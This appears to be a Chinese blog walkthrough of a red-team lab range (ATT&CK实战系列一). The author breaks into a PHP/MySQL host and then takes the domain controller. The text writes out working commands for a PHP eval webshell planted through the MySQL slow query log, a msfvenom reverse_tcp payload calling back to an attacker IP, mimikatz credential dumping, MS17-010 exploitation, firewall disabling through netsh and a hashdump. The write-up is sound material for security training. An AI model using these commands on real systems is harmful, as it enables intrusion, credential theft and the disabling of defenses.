ATT&CK实战系列一
网络拓扑图
nmap 端口扫描
发现80端口
直接访问IP
是一个PHP探针 未发现目录
使用dirsearch扫描目录
弱口令root root
搜索了一下2014 PHP 探针漏洞 兜兜转转找到一篇文章
先使用show variables like “%general%”
查询general_log 是否开启
使用命令set global general_log = on;开启
通过phpinfo.php(目录扫描得到)
得到绝对路径
直接执行select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/www/1.php';
执行后报错
查询show global variables like '%secure%';
发现在当前版本下这个 secure_file_priv的值默认为NULL 无法继续利用
利用mysql慢查询日志getshell
set global slow_query_log=1;
首先,设置slow_query_log=1.即启用慢查询日志
set global slow_query_log_file=“C:\\phpStudy\\WWW\\shell.php”
伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名
select '<?php @eval($_POST["cmd"]);?>' or sleep(11);
将一句话写入
蚁剑链接成功
内网信息收集
有两张网卡,192.168.52.143和192.168.1.136
没有任何安全狗之类的防护设备,不用做免杀
系统漏洞挖掘
metesploit提取和内网信息收集
直接做个木马上传msf监听上线
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.162 lport=12345 -f exe >shell.exe
直接用攻击向量提取getsystem
通过mimikatz抓取到了本地管理员Administrator明文密码 hongrisec@20199
msf容易掉线,所以cs上线后提权操作
域是GOD
域内所有计算机
域控机器名为OWA,另一台则叫ROOT-TVI862UBEH
获取域内登录过的用户信息
也可以直接定位域控
通过域内信息收集得到
两个IP段:192.168.1.136 192.168.52.143
域名:god.org
域管:owa
域管IP:192.168.52.138
对域控进行渗透
添加路由
开启代理 use server/socks_proxy
proxychains设置代理nmap扫描内网 sudo vi /etc/proxychains4.conf
扫描常用端口
开着445端口,扫描域控是否存在永恒之蓝ms17_010,确认后可以直接使用msf
打了几次也换了exp和payload都没有成功,原来没有关闭防火墙
所以使用ms17_010的远程命令执行关闭防火墙
set command netsh advfirewall set allprofiles state off
关闭防火墙之后用正向连接shell
windows/x64/meterpreter/bind_tcp
至此就打了域控的system权限
最后用mimikatz抓取密码
导出hash run post/windows/gather/hashdump
扫一扫
2049
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
